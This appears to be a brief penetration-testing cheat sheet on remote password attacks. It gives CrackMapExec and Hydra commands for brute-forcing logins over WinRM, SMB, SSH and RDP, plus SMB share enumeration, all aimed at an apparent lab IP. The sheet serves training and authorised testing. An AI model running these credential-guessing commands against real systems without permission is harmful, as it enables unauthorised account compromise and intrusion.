Remote Password Attacks

CrackMapExec

General Usage

$ crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>

Sample Command

$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list

Getting SMB Shares

$ crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares

Hydra

SMB

$ hydra -L user.list -P password.list smb://10.129.42.197

SSH

$ hydra -L user.list -P password.list ssh://10.129.42.197

RDP

$ hydra -L user.list -P password.list rdp://10.129.42.197

MSFConsole

SMB

Last updated